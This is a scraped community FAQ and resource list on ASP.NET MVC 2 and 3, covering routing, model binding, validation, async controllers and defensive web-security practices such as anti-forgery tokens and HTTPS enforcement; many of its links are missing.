A: ScottGu recommends MVC 2. See where he writes I would go with ASP.NET MVC 2 for a new project.
Q: How do I get started with MVC?
- Walkthrough: Creating a Basic MVC Project with Unit Tests in Visual Studio Includes a VB/C# sample. (Requires MVC 2)
- Walkthrough: Using MVC View Templates with Data Scaffolding Includes a VB/C# sample. (Requires MVC 2)
- Walkthrough: Using Templated Helpers to Display Data Includes a VB/C# sample. (Requires MVC 2)
- ASP.NET MVC 2 application in Visual Studio 2010
- How to: Validate Model Data Using DataAnnotations Attributes (Shows how to use Entity Framework with MVC) Includes a VB/C# sample. (Requires MVC 2)
- I would skip the MovieDb tutorials – 90% of the work is creating the DB, which has nothing to do with MVC.
- Understanding Action Filters, ASP.NET MVC QuickStart 7: Action Filters, or the VB version of Understanding Action Filters
- About Technical Debates (and ASP.NET Web Forms and ASP.NET MVC debates in particular)
MVC 3 Blogs/Posts:
- Granular Request Validation in ASP.NET MVC 3 A++
- How do I create a template in MVC3/Razor to pass in title and content?
Razor provides a streamlined way of creating html helpers. In your page you can add the following:
@helper MyClipTemplate(string title, string content) {
    <div class="Clip">
        <h3>@title</h3>
        <div class="View">
            @content
        </div>
    </div>
}
Then from elsewhere in the file you can just call it like a regular method: @MyClipTemplate("The title", "The content")
MVC Must Read Blogs:
- Input Validation vs. Model Validation in ASP.NET MVC by Brad Wilson
MVC 2 Blogs:
- ASP.NET MVC 2 Templates (awesome 4 part series)
- ASP.NET MVC 2: Strongly Typed Html Helpers
- How to: Validate Model Data Using DataAnnotations Attributes
- Walkthrough: Using Templated Helpers to Display Data
- Using an Asynchronous Controller in ASP.NET MVC
- Extending ASP.NET MVC 2 Templates by Kazi Manzur
- Enterprise Library Validation example for ASP.NET MVC 2
- ASP.NET MVC 2 Preview 2 by Phil Haack
- Client Side Validation with MVC 2 Preview 2
- Html.RenderAction and Html.Action These methods allow you to call into an action method from a view and output the results of the action in place within the view.
- ASP.NET MVC 2.0 Tutorials by David Hayden
- Using ModelMetaData in ASP.Net MVC 2 to wire up sweet jQuery awesomeness by Eric Hexter
MVC 2 Code Samples:
- ASP.NET MVC Extensions (these are really great for extensibility, OoC, multi-adaptor and more) <—NEW and recommended
Whats new in MVC 2 Code
There are three major new features in MVC 2, and several smaller ones (and bug fixes, of course).
Areas is a feature which allows segmentation and separation of your application, so that application features can be developed in isolation from one another (either in a single project or several).
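A minimal sketch of wiring up an area in MVC 2 (the "Admin" area name and route pattern are assumptions for illustration, not from the FAQ):

```csharp
// Placed in the area's folder; discovered by AreaRegistration.RegisterAllAreas(),
// which is called from Application_Start in Global.asax.
public class AdminAreaRegistration : AreaRegistration
{
    public override string AreaName
    {
        get { return "Admin"; }
    }

    public override void RegisterArea(AreaRegistrationContext context)
    {
        // Routes registered here only match URLs inside this area.
        context.MapRoute(
            "Admin_default",
            "Admin/{controller}/{action}/{id}",
            new { action = "Index", id = UrlParameter.Optional });
    }
}
```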
Templated Input Helpers is a feature which can auto-generate forms and editors for your models, including allowing you to override templates (for example, if you always want dates edited on your site to include a drop-down Javascript calendar).
Pluggable Validation with Client-Side Validation Support allows users to get client-side validation support with jQuery Validation and DataAnnotations attributes out of the box, and supports a pluggable API to replace both client-side and server-side pieces.
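A minimal sketch of DataAnnotations-driven validation (the Product model below is illustrative); in MVC 2 the same attributes feed server-side ModelState checks and, together with jQuery Validation, the client-side rules:

```csharp
using System;
using System.Collections.Generic;
using System.ComponentModel.DataAnnotations;

// Illustrative model: the attributes drive both server- and client-side validation.
public class Product
{
    [Required(ErrorMessage = "Name is required.")]
    [StringLength(50)]
    public string Name { get; set; }

    [Range(0.01, 10000.00)]
    public double Price { get; set; }
}

public static class ValidationDemo
{
    // Runs the same attribute checks the MVC model binder applies server-side.
    public static bool IsValid(object model)
    {
        var results = new List<ValidationResult>();
        return Validator.TryValidateObject(
            model, new ValidationContext(model), results, validateAllProperties: true);
    }
}
```

In a view, placing <% Html.EnableClientValidation(); %> before Html.BeginForm turns on the matching client-side checks.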
You can see the ASP.NET MVC 3 Roadmap on our CodePlex site.
Stephen Walther on ASP.NET MVC
Good Tutorials
Get The Drop On ASP.NET MVC DropDownLists
Drop-down Lists and ASP.NET MVC
Adding Multiple Nested Data in ASP.NET MVC Application
Performing Validation in an ASP.NET MVC Application
Populating Hierarchical Data Using Model Binders in ASP.NET MVC Application
ASP.NET MVC Framework and JavaScript BFFF!
Creating ASP.NET MVC Helpers
Good Overviews
- The Life And Times of an ASP.NET MVC Controller
- The Life of an ASP.NET MVC Request
- ASP.NET MVC QuickStart 8: partial updates using jquery
- Using jQuery Grid With ASP.NET MVC
Awesome MVC Blogs
- Encrypted Hidden Inputs in ASP.NET MVC
- Stephen Walther's MVC blogs.
- Kazi Manzur Rashid’s Blog
- Passing anonymous objects to MVC views and accessing them using the new c# dynamic keyword
- TempData and DropDownList in ASP.Net MVC
- Session and Pop Up Window
- ASP.NET MVC 2 Optional URL Parameters Phil Haack
Client side Validation
Q: What’s the difference between ResolveUrl and Url.Content, and why should I favor the latter?
A: Url.Content is preferred because it works with the Web Forms view engine, Razor, or any custom view engine, while ResolveUrl only works with the Web Forms view engine. Url.Content() generates a correct subdomain-relative link; ResolveUrl() will generate an incorrect link. See
Must read on CDN usage: See
Routing
Route data vs. Model data – who wins?
Q: If a route defines a parameter with the same name as a model property, and we call a strongly typed HTML helper (for example Html.TextBoxFor(x => x.PropertyName)), we get the value from the route parameter instead of the model property.
A: For a complete example, see the linked thread.
Using outputCache with RenderAction and Partial View – see
implicit [Required] and value types – see
[HttpPost] is shorthand for [AcceptVerbs(HttpVerbs.Post)]. The only difference is that you can’t use [HttpGet, HttpPost] (and similar) together on the same action. If you want an action to respond to both GETs and POSTs, you must use [AcceptVerbs(HttpVerbs.Get | HttpVerbs.Post)].
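As a sketch (the controller and action names are illustrative, not from the FAQ), the two attribute forms look like this:

```csharp
public class AccountController : Controller
{
    // Responds to both GET and POST; [HttpGet, HttpPost] together would not work.
    [AcceptVerbs(HttpVerbs.Get | HttpVerbs.Post)]
    public ActionResult Ping()
    {
        return Content("pong");
    }

    // Shorthand form: POST only.
    [HttpPost]
    public ActionResult LogOn(string userName, string password)
    {
        // ... authenticate ...
        return RedirectToAction("Index", "Home");
    }
}
```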
Good Route Blogs/Threads
-
-
- Creating a Route Constraint (C#) — VB version
Q: My view model has user=Haacked, but the view displayed from http://localhost/home/JoeSmith shows user=JoeSmith, not Haacked as I expected.
A: See this excellent thread on ModelState.
Q: Why doesn’t the following route work “{controller}/{action}/{alias}#{anchor}”.
A: Fragments can’t be put into routes. Instead, use a link generator that takes the fragment as a parameter.
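For example, Html.ActionLink (MVC 2) has an overload that accepts a fragment; the controller, action, and anchor names below are illustrative:

```aspx
<%= Html.ActionLink("Jump to comments",
        "Details", "Posts",
        null /* protocol */, null /* hostName */,
        "comments" /* fragment */,
        new { id = 42 }, null /* htmlAttributes */) %>
<%-- renders a link like /Posts/Details/42#comments --%>
```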
Comment: Routing supports optional parameters and catch-all parameters. Optional parameters let you chop off unused parameter segments at the end of the URL, but you cannot have optional parts removed from the middle of the URL. Catch-all parameters let you include all remaining URL segments at the end of a URL, but then it’s up to you to split them out into individual values. Without routing at all you can use query strings, in which case the key-value pairs are all optional with respect to the URL.
Q: Linq to SQL or Entity Framework?
A: If you’re building a new application, we recommend that you start with the Entity Framework rather than LINQ to SQL.
We continue to invest in both the Entity Framework and LINQ to SQL in .NET 4.0 and beyond. In .NET 4.0, we made a number of performance and usability enhancements to LINQ to SQL, as well as updates to the class designer and code generation. We will add new features as customer needs dictate, but the Entity Framework will be the recommended data access solution going forward. See also
Q: How do I get the name of the current controller and action in a view?
A: override OnActionExecuting() and access ViewData + RouteData – See
Q: Output caching for several client IPs
A: See
Q: How do I EnableClientValidation for only some forms on a page?
A: <% ViewContext.ClientValidationEnabled = false; %>
Call this before the form(s) for which you want to disable validation. If you want to re-enable later in the page, just call EnableClientValidation() again (or set that property to true). See
Q: How do I keep the values of a model’s unused members during an update? *****
A: Stick a [Bind(Exclude = "CreatedByUserId")] attribute on the model type. This will prevent the binder from ever attempting to set that property. See
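A sketch of the same idea applied at the parameter level (the Order model and its properties are hypothetical):

```csharp
using System.Web.Mvc;

// Hypothetical model; CreatedByUserId must survive edits untouched.
public class Order
{
    public int Id { get; set; }
    public string Description { get; set; }
    public int CreatedByUserId { get; set; }
}

public class OrderController : Controller
{
    [HttpPost]
    public ActionResult Edit([Bind(Exclude = "CreatedByUserId")] Order order)
    {
        // The binder never attempts to set CreatedByUserId, so the
        // value already stored in the database is preserved when you
        // merge the posted values onto the existing entity.
        return RedirectToAction("Index");
    }
}
```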
Q: Why was Default.aspx removed from MVC 2?
A: The Default.aspx file is only needed when running on IIS6 or in IIS7 Classic Mode. Neither Cassini (the built-in VS web server) nor IIS7 Integrated Mode (the default) needs Default.aspx. The reason we took Default.aspx out is that there are many steps required to get ASP.NET MVC to work on IIS6 and IIS7 Classic Mode, and having Default.aspx in the project doesn’t help very much anyway since there are so many other steps.
Q: MVC is not working with GridView/ListView
A: ASP.NET MVC does not support data sources and does not support the GridView. If that is your preferred method of programming, you should use ASP.NET WebForms. Alternatively, consider the Telerik ASP.NET MVC Grid.
Q: MVC or Web Forms?
- ScottGu on Web Forms v. MVC
- article by shiju varghese
- and a question on SO
-
-
-
-
Q: WebForms vs. MVC on pipeline events (not Page pipeline events).
A: All of the real (i.e., not Page-level) ASP.NET pipeline events will happen in exactly the same manner regardless of which UI framework you use. In other words, if you have a module that hooks up events, you can be confident it will work just fine for both MVC and Web Forms.
Q: ViewData vs. TempData
Q: How do I figure out route order?
A: Use Phil Haack’s route debugger – Also see Manually unit testing routes in ASP.NET MVC
Q: What is the correct way to write a delete action?
A: See
-
-
-
Q: How do I bind my model to a List?
A: See Phil’s blog Model Binding To A List
Q: My jQuery/JSON works fine on my machine, but doesn’t work on the server.
A: Your URLs are not being resolved correctly. See
Q: How can I find memory leaks and profile memory usage of my MVC app?
A: Use the CLR Profiler:
Thomas M. has a nice blog of how to use the profiler with ASP.NET:
Q: I have a view where the user fills out a form, submits and the data is displayed on a confirmation page. They must submit the confirmation page before the DB is updated (or their credit card is charged). The problem is, the confirmation page is nothing but text; so when they submit that View, nothing will be passed to the controller. The controller has no way of knowing what information the user entered 2 views ago.
A: The easiest thing to do would be to shove it into Session (if Session is enabled). Otherwise use hidden input fields or the Html.Serialize() helper from Futures. Absolutely do not use TempData for this. Hidden form fields are the right answer for scalability reasons. TempData is the wrong choice because if the user refreshes the confirmation page, the TempData will be destroyed. Also, if Session is disabled, the default TempData provider is broken too (since it’s based on Session).
Q: I’m trying to pass my custom object via RedirectToAction and it’s not working, why?
A: RedirectToAction() works by shoving data into the URL. Since an AbcFilter can’t be put into the URL, this doesn’t work. Try using TempData for this instead: See
Q: Can MVC 1 be installed on Visual Studio 2010?
A: No, VS2010 is not compatible with MVC 1.0. For that you will need to stick with VS 2008. See
Q: In my custom view engine, ViewLocationCache is always empty, why?
A: See
Q: Is there a way to precompile MVC application including code and views for deployment?
A: You need to install the Visual Studio Web Deployment add-in (see). In your MVC solution, right-click on the MVC project and select "Add Web Deployment Project…" (thanks to Jacques). Running the command-line utility aspnet_compiler will also do the job. The command line is: (framework directory)\aspnet_compiler -v /virtualDirName outputDirectoryName
Q: I’m using partial views and jQuery. When I use jQuery to do the post and update the page, my JavaScript fires as I would expect. If I let Ajax.BeginForm handle it, the JavaScript doesn’t execute. Why?
A: When you update the DOM with new HTML, the browser doesn’t automatically execute scripts in the new bit of HTML. MVC Ajax helpers would need to parse the partial HTML and try and execute the scripts, which is tricky and something we don’t currently do.
One approach you could take is to look at jQuery live events. – source
JQuery and partial views in an ASP.NET MVC application
Combine/Compress/Minify JS and CSS files in ASP.NET MVC
How to load partial view dynamically in ASP.NET MVC using JQuery
Q: How do I mix Web Forms and MVC?
A: see
Q: Is it possible to use enums in a controller action method?
A: Yes – See
Q: What does the following do:
routes.IgnoreRoute("{resource}.axd/{*pathInfo}");
routes.IgnoreRoute("{resource}.aspx/{*pathInfo}");
A: Tells the routing engine to ignore requests that end in .axd or .aspx (.aspx is needed for MVC on IIS6).
Q: Invalid viewstate exception when using AntiForgeryToken error on Hosted site.
A: You can read more here: How To Fix the: “Validation of viewstate MAC failed” Error (ASP.NET MVC)
Q: Can open generic methods be used with controllers?
A: Do you mean an open generic method, such as:
public class MyController : Controller {
public ActionResult SomeAction<T>(T myParameter) { … }
}
Or a method that is generic on a class:
public class MyController<T> : Controller {
public ActionResult SomeAction(T myParameter) { … }
}
Example #1 is not supported in ASP.NET MVC because we don’t know the type of "T". Example #2 is technically supported in MVC since by the time we get to the method we already know what the "T" is. However, the default controller factory in ASP.NET MVC cannot construct generic classes. If you have a controller factory that can create MyController<T> then ASP.NET MVC can call the action method on it.
Q: I thought the default http handling was synchronous, but that’s not the behavior I’m seeing.
A: With the addition of AsyncController in MVC2, the MvcHandler class needs to be an IHttpAsyncHandler now, which means that as far as the ASP.NET core runtime is concerned, the entry points are now BeginProcessRequest and EndProcessRequest, not ProcessRequest. See
Q: Why is Html.ValidationSummary inconsistent in my app?
A: Validation happens during model binding, either implicit binding via action parameters or explicit binding via calls to (Try)UpdateModel.
Q: How do I preserve HTML in error messages?
A: You’re likely going to be more interested in the workings of Html.ValidationMessage() and our other helpers rather than the workings of AddModelError(). AFAIK all of the UI helpers encode their output, so HTML like <br /> will always be rendered as literal text rather than markup.
If you want to display the error messages as HTML, you’ll have to create a new helper like Html.FormattedValidationMessage() which is based off of Html.ValidationMessage() but doesn’t encode the data. Take a look at the source for Html.ValidationMessage() and you’ll find that it’s not a very complex method. It should be fairly straightforward to copy that code into a new method that leaves out the line that does the HTML encoding.
See (this thread also shows the wrong way to implement error messages with HTML; the wrong approach opens you up to a potential cross-site scripting attack).
Q: I added a new field to my model. I did not mark it required, but when I don’t include it on submit/POST, ModelState.IsValid is false and I get the error "the field value is required."
A: Properties of non-nullable types are by definition mandatory, even without [Required]. An empty value ("", which we convert to null) is submitted back to the server, and we can’t convert that value to an Int32, so binding fails. If you need a field to be optional, you should make it nullable. In that case, we can successfully store a null value in the property.
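A small sketch of the difference (model and property names are hypothetical):

```csharp
using System.ComponentModel.DataAnnotations;

public class PersonModel
{
    // Non-nullable value type: implicitly mandatory. An empty post
    // ("" converted to null) cannot be converted to Int32, so
    // binding fails with "the field value is required."
    public int Age { get; set; }

    // Nullable value type: an empty field binds to null, no error.
    public int? ShoeSize { get; set; }

    // Reference types are optional unless explicitly marked.
    [Required]
    public string Name { get; set; }
}
```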
Q: How do I create a general validation attribute for checking uniqueness in a LINQ to SQL data context?
A: See
Q: What’s the correct way to get the controller name and action from an httpContext object?
A: You can’t; you need at minimum a RequestContext object. If you have one, you can call RouteData.GetRequiredString("controller") / RouteData.GetRequiredString("action").
Q: My MVC app has a class that initializes a variable (DateTime.Now in this case). The value seems to be cached. What’s going on here?
A: HttpApplication instances are cached and reused, so the value of the variable is indeterminate because the constructor can run again at any moment. See
Q: How do I use partial views to display data on every page using Site.Master? Is it necessary for every controller to deliver the model data?
A: Yes, OR If you’re using ASP.NET MVC 2, You can use RenderAction instead of RenderPartial. This will allow you to centralize the data collection and partial view into a mini-action.
Q: I’m not getting the validation error message I specify.
A: What you’re seeing may not be validation but model binding failures. You can use resources for this message. See
Q: System.EntryPointNotFoundException: Entry point was not found. when unit testing html helpers
A: See
Q: query string parameters and view model fields binding problems?
A: See
Q: When I upload large files I get a HTTP 404 error.
A: I fixed it by just maxing out the maxRequestLength value and not setting any other property values.
<httpRuntime maxRequestLength="2097151"/> See also
Q: How do I call halt the MVC pipeline when my controller has an exception? How do I call Response.End()?
A: Response.End() is not supported in MVC 2 / 3. Instead, throw an HttpException, passing the HTTP status code you want to the constructor. This will halt control flow of the application.
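A minimal sketch (controller and action are hypothetical):

```csharp
using System.Web;
using System.Web.Mvc;

public class ReportController : Controller
{
    public ActionResult Download(int id)
    {
        if (id <= 0)
        {
            // Halts the MVC pipeline with a 404 instead of calling
            // the unsupported Response.End().
            throw new HttpException(404, "Report not found");
        }
        return View();
    }
}
```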
Q: Is there a VB.NET equivalent to the C# "dynamic" type in a view?
A: Turning "Option Strict" off. VB.NET can also use the new "dynamic" type, but it doesn’t work in medium trust in VB.NET, so we recommend people turn off Option Strict instead.
The ASP.NET Development Server (from Visual Studio), AKA Cassini, eats the status description. You need to test this with a real IIS server. See
Binding
Q: I’m trying to use DataAnnotations to force an input field to the right type, but when the wrong data type is entered I don’t get the error message I specified in my DataAnnotations. I get the error “value is not valid for this field", and the value is null, not the incorrectly entered data.
A: Validation attributes are applied after model binding. The message you see comes from the model binder when it catches a wrong-format exception generated by the converter. For more info see
Q: I am unable to get a value for Html.TextBoxFor(m => m.name) in the view.
A: This value is only automatically maintained if it is retrieved via model binding. It’s the model binding process that puts the current value into ModelState, which is how we automatically round-trip things. If you don’t somehow model bind "name", the value won’t be preserved. You either need to model bind it or set the value into ModelState by hand. See
Q: I have an Html.TextBoxFor input field in my view bound to a property called Test on my view model. When I change this value in the POST action in the controller and then return View(viewModel), the change is discarded!
A: You can override this behavior by removing the ModelState entry for the property. All the HTML helpers get the previously posted value for re-display from the ModelState dictionary.
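A sketch of that override (the view model, controller, and property names are hypothetical):

```csharp
using System.Web.Mvc;

// Hypothetical view model with the property being edited.
public class MyViewModel
{
    public string Test { get; set; }
}

public class ProfileController : Controller
{
    [HttpPost]
    public ActionResult Edit(MyViewModel viewModel)
    {
        viewModel.Test = "value changed on the server";

        // Without this, Html.TextBoxFor(m => m.Test) re-displays the
        // previously posted value from ModelState, not the new one.
        ModelState.Remove("Test");

        return View(viewModel);
    }
}
```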
Debug
Q: The VS 2010 debugger is showing the following exception "This property cannot be set to a null value." – But when I run the code outside of Visual Studio I don’t see the error.
A: This is expected behavior. Internally, MVC is setting the model’s ISBN property to null. This is triggering EF validation within the property setter and is throwing an exception. MVC swallows this exception and moves on to the next property of the model.
You’ll see the debugger activate on this exception if you have Visual Studio set up to break on CLR exceptions (via the menu Debug -> Exceptions). If you’re not running under a debugger or don’t have the debugger configured to pause on exceptions, you won’t see this exception. Hitting F5 (to continue) from within the debugger will allow program execution to continue as normal. – See
Security
Q: How do I hide sensitive information from my model (Like SSN, salary, etc)?
A: What most developers do is store an identifier instead of the actual sensitive data. For example, if you’re updating an Employee (from the table Employees), each Employee might contain sensitive information like the tax identification number, salary, family members, etc.
Instead, one option is to send a single hidden field containing only the employee id (which presumably isn’t sensitive information). When the action executes, it reads this hidden field to perform an Employee lookup by number against the database. Now the action has access to all of the sensitive information without having exposed it in the form.
If you go this route, you’ll have to take some other precautions. For example, you’d have to verify that the person submitting the form actually has access to that particular Employee record (otherwise they could tamper with the EmployeeId field in the form). You’ll also have to prevent over-posting if you’re binding directly to an Employee object. (This latter point is why I always implore people not to bind directly to their database models, but instead to use view-specific models and map them to database models as necessary.)
Q: How does <authorization> <allow roles="SomeRole"/> in web.config work in MVC
A: In MVC, your resources are controllers, not URLs. So if you wanted to restrict access to an entire AdminController, for example, you’d put[Authorize(Roles = "Administrator")] on the controller class.
If you need to secure a group of controllers, put the attribute on a AdminControllerBase class, then have each controller you need to secure subclass that type. The framework will automatically apply the attribute to the subclassed types.
In ASP.NET MVC this is done with a special kind of filter namely IAuthorizeFilters. If you define them on controller level you define them for all your actions and if you have a base controller you define them for all controllers that are derived from this base controller. see
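A sketch of the base-controller approach described above (class names are hypothetical):

```csharp
using System.Web.Mvc;

// Every controller deriving from this base class is restricted
// to users in the Administrator role.
[Authorize(Roles = "Administrator")]
public abstract class AdminControllerBase : Controller
{
}

public class UsersAdminController : AdminControllerBase
{
    // Inherits the [Authorize] restriction automatically.
    public ActionResult Index()
    {
        return View();
    }
}
```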
HTML Encoding extensibility
Q: I have a situation where I need a finer grain security within my page than what is available with forms authentication, membership and roles.
A: See
Q: I have multiple tabs open to a web site. When I close one tab, Formsauthentication doesn’t clear.
A: What is the particular problem you’re trying to solve here? "I need to log a user out when he closes a browser tab" isn’t a problem; it’s a means to an end. Why do you need to log the user out when he closes the tab? If you back up to the original problem, perhaps we’ll all find another way to solve it.
In general, browsers store temporary cookies (including the ASP.NET FormsAuthentication cookie) for the entire lifetime of the browser process. Since closing a tab doesn’t kill the browser process itself, the temporary cookie sticks around until the browser is fully closed. So if within the same browser process you open a new tab and visit your web site, the browser will send the temporary cookie to the site. This isn’t a flaw or a failure; this is just how cookies work. See
Q:.
A:
Is your component fully trusted and you want to prevent partial trust code from accessing it? If so, just wrap the object to be stored into Items in a type that’s internal to your application, and protect the class with a demand:
[PermissionSet(SecurityAction.LinkDemand, Name="FullTrust")]
internal sealed class MyWrapper {
    internal object WrappedObject;
}
See
Q: How do I create an authorize filter that take parameters?
A: See
Q: Why is a " A required anti-forgery token was not supplied or was invalid" Exception thrown when I follow the sequence:
- Login (Successful)
- Go back (via browser back button)
- Login (Exception)
with
[HttpPost]
[ValidateAntiForgeryToken]
public ActionResult Login(LoginModel loginModel, string returnUrl)
{
    // validate login, set auth cookie
}
A: This behavior is correct. The anti-forgery tokens are tied to specific users (or the ‘guest’ user if the current user is not logged in). The first time the form is generated, the user is not logged in, so a token is generated for the user GUEST. The user hits the login button, the token validates correctly (since the user has not yet been logged in), your controller logs the user in, and life is good. Let’s assume he logged in as JOE.
Now, if the user hits the back button, he’ll be taken back to the original form. (More specifically, he’ll see the cached version of the original form, complete with GUEST token.) When he tries to submit the login again, the GUEST token cannot be used for a request coming from JOE, so the system rejects the token.
This is pretty much the same behavior you’ll see at some banking and other web sites, many of which don’t allow you to use the back button once you’ve logged in. Their tokens follow a similar pattern of being tied to a specific user, and if an old token is used with a logged-in user they will fail.
Presumably this shouldn’t be problematic, as the particular scenario under consideration (submitting the exact same form under two different identities) isn’t something most users do and isn’t something that’s always expected to work properly. If this is however a problem for you, you could remove [ValidateAntiForgeryToken] from the Login() action.
Q2 (continued): if I create a custom ActionFilter it does not fire before the ValidateAntiForgeryToken.
A: ValidateAntiForgeryTokenAttribute is an authorization filter (it implements IAuthorizationFilter), while your filter is a regular action filter (it implements IActionFilter and IResultFilter via subclassing ActionFilterAttribute). Authorization filters are always executed before action filters, regardless of ordering. Ordering can only be used to order authorization filters relative to other authorization filters, action filters relative to other action filters, etc.
Instead, your filter should subclass FilterAttribute (instead of ActionFilterAttribute) and implement the IAuthorizationFilter interface. From the OnAuthorization() method, perform the necessary check + redirect. Since both your attribute and the [ValidateAntiForgeryToken] filter are authorization filters, their Order properties will be respected.
Filter execution is grouped by filter type: authorization filter, action filter, response filter, and exception filter. *All* of the authorization filters go first, then *all* of the action filters, then *all* of the response filters. Within these particular groups, ordering is determined by the rules detailed at (Order of Execution for Action Filters). By the rules detailed at this article, the Controller.OnAuthorization() method will execute before any authorization filter, regardless of the filter’s Order. For more details see
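A sketch of the suggested authorization filter (the attribute name and redirect target are hypothetical):

```csharp
using System.Web.Mvc;

// Subclasses FilterAttribute + IAuthorizationFilter (not
// ActionFilterAttribute), so it runs in the authorization stage and
// its Order is respected relative to [ValidateAntiForgeryToken].
public class MyAuthCheckAttribute : FilterAttribute, IAuthorizationFilter
{
    public void OnAuthorization(AuthorizationContext filterContext)
    {
        // Perform the necessary check, then redirect on failure.
        if (!filterContext.HttpContext.Request.IsAuthenticated)
        {
            filterContext.Result = new RedirectResult("~/Account/Login");
        }
    }
}
```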
The [RequireHttps] attribute can be used on a controller type or action method to say "this can be accessed only via SSL." Non-SSL requests to the controller or action will be redirected to the SSL version (if an HTTP GET) or rejected (if an HTTP POST). You can override the RequireHttpsAttribute and change this behavior if you wish. There’s no [RequireHttp] attribute built-in that does the opposite, but you could easily make your own if you desired.
There are also overloads of Html.ActionLink() which take a protocol parameter; you can explicitly specify "http" or "https" as the protocol. Here’s the MSDN documentation on one such overload. If you don’t specify a protocol or if you call an overload which doesn’t have a protocol parameter, it’s assumed you wanted the link to have the same protocol as the current request.
The reason we don’t have a [RequireHttp] attribute in MVC is that there’s not really much benefit to it. It’s not as interesting as [RequireHttps], and it encourages users to do the wrong thing. For example, many web sites log in via SSL and redirect back to HTTP after you’re logged in, which is absolutely the wrong thing to do. Your login cookie is just as secret as your username + password, and now you’re sending it in cleartext across the wire. Besides, you’ve already taken the time to perform the handshake and secure the channel (which is the bulk of what makes HTTPS slower than HTTP) before the MVC pipeline is run, so [RequireHttp] won’t make the current request or future requests much faster.
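A minimal sketch of [RequireHttps] in use (controller and action names are hypothetical):

```csharp
using System.Web.Mvc;

public class PaymentController : Controller
{
    // HTTP GETs are redirected to the HTTPS version of this URL;
    // non-SSL POSTs are rejected outright.
    [RequireHttps]
    public ActionResult CardDetails()
    {
        return View();
    }
}
```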
Q: How do I create an authorize filter in asp.net mvc?
A: See
Q: How do I create a single custom authorization attribute to be added to controller actions that require authenticated users.
A: See for more details
Force MVC Route URL to Lowercase and
Q: How does ModelMetadata work? How does Html.Editor() get metadata?
A: See
Q: How do I move the authorization out of being hard-coded in the app and into a DB table where it can then be administered by the apps admin functions?
A: See
Q: How do I generate HTTPS URLs?
A:
Q: How do you get a redirect to send an HTTP POST instead? This is necessary for passing control to PayPal’s payment page.
A: See
SECURITY
Prevent Cross-Site Request Forgery (CSRF) using ASP.NET MVC’s AntiForgeryToken() helper Steven Sanderson’s awesome MVC CSRF blog posting.
Q: How can I create a secure form URL?
A:
Q: I have a custom Authorize attribute, which implements OnAuthorization. In the default OnAuthorization, an HttpUnauthorizedResult is set when there is an authorization failure. Can I intercept this ActionResult somewhere and take a specific action based on it. I do not want to put all the redirection logic etc. in OnAuthorization
A: In general your subclassed AuthorizeAttribute should not override OnAuthorization(). Override HandleUnauthorizedRequest() instead and set the filterContext.Result property as appropriate from within that method.
Q: How do I prevent a user from sending us confidential data (credit card number, SSN, etc.) over an unsecured channel (HTTP)?
A: You can’t. If the user sends confidential data via HTTP you can’t go back in time and undo the transmission. Action methods that handle posts of confidential data should use the [RequireHttps] Attribute; the action method will ignore the post and force the sender to use HTTPS.
Q: Will the [RequireHttps] Attribute prevent Man in the Middle Attacks (MITM) or DNS cache poisoning attacks?
A: The [RequireHttps] Attribute can’t prevent MITM or DNS cache poisoning attacks, but HTTPS in general does protect against these.
Q: How do I intercept HttpUnauthorizedResult() when it’s set in OnAuthorization?
A: In general your subclassed AuthorizeAttribute should not override OnAuthorization(). Override HandleUnauthorizedRequest() instead and set the filterContext.Result property as appropriate from within that method. See
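A sketch of the recommended override (the attribute name and redirect target are hypothetical):

```csharp
using System.Web.Mvc;

public class CustomAuthorizeAttribute : AuthorizeAttribute
{
    // Leave OnAuthorization() alone; customize only the failure path.
    protected override void HandleUnauthorizedRequest(AuthorizationContext filterContext)
    {
        // Replace the default HttpUnauthorizedResult with your own result.
        filterContext.Result = new RedirectResult("~/Error/AccessDenied");
    }
}
```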
Q: How do I handle exceptions in a View?
A: You can use ELMAH. Check out this article and go to the "How to wire this up in ASP.NET MVC" section for more info.
[HandleError] will catch exceptions from views and HTML helper methods. But since you can only put it on a controller or an action, it’s not global.
You can use ELMAH to do exception logging application-wide (not just within MVC) and across multiple controllers. Hanselman also wrote about this –.
Q: Switching between HTTP and HTTPS in ASP.NET MVC2
A: See
Q: I’m getting the "A potentially dangerous Request.Form value was detected from the client" error.
A: See.
It’s best to think of .aspx / .ascx views in MVC applications as templates rather than proper pages. The MVC framework will run the template (which might contain basic code snippets like calling helpers), but it’s not guaranteed to execute the page pipeline in any sane fashion. This implies that events might execute out of order, with uninitialized parameters, or not at all. But this is OK for MVC, since views shouldn’t be hooking such events in the first place.
The DataTypeAttribute does not contain any validation logic itself. The hooks are there for people writing custom data types that derive from DataTypeAttribute, to contain not only the data type (and appropriate formatting information) but also validation logic. See
Q: How do I prevent the error A potentially dangerous Request.Form value was detected from the client with .Net 4 (ie, without using <httpRuntime requestValidationMode="2.0" />)?
A: You can write a custom request validator which excludes certain fields from validation but still validates every other field. See for full documentation on how to do this. In brief, your IsValidRequestString() method would have the following logic:
– If the current URL (as read from the HttpContext object) is ~/somepage *and* the current collection is form *and* the current key under consideration is "field-to-exclude", return true to signal that this value is OK.
– Otherwise call base.IsValidRequestString() to run the default validation logic over this field.
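The two steps above can be sketched with .NET 4's RequestValidator extensibility point (the page path and field name are placeholders):

```csharp
using System.Web;
using System.Web.Util;

public class CustomRequestValidator : RequestValidator
{
    protected override bool IsValidRequestString(
        HttpContext context, string value,
        RequestValidationSource requestValidationSource,
        string collectionKey, out int validationFailureIndex)
    {
        validationFailureIndex = -1;

        // Skip validation for one known form field on one page only.
        if (requestValidationSource == RequestValidationSource.Form &&
            collectionKey == "field-to-exclude" &&
            context.Request.Path.EndsWith("/somepage"))
        {
            return true;
        }

        // Everything else gets the default validation logic.
        return base.IsValidRequestString(context, value,
            requestValidationSource, collectionKey, out validationFailureIndex);
    }
}
```

Register it in web.config via the httpRuntime element's requestValidationType attribute.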
Asynchronous
All about the AsyncTimeout filter: See
Q: Do I need to use an AsyncController to allow my users concurrent AJAX requests?
A: See
Q: How do I implement multiple synchronization points on Controller async action?
A: You can do this using manual counters. In short:
– Call AsyncManager.OutstandingOperations.Increment() once at the very beginning of the request. Don’t touch OutstandingOperations again until the very last step below.
– Kick off your three parallel operations. Keep your own separate counter (initialized to 3). As each operation completes, decrement this counter by one.
– When your internal counter hits zero, you know that the first set has completed. Kick off your next set (with a separate counter, initialized to the number of items in the new set). As each operation completes, decrement this counter by one.
– Repeat as necessary for each set.
– When all sets have completed, call AsyncManager.OutstandingOperations.Decrement() to complete the work.
The reason this works is because from the AsyncManager’s perspective, your entire block of work is one gigantic asynchronous operation (hence why the counter was incremented / decremented only once). You’re going to be kicking off extra work as part of this single block, but AsyncManager doesn’t know of or care about that.
See
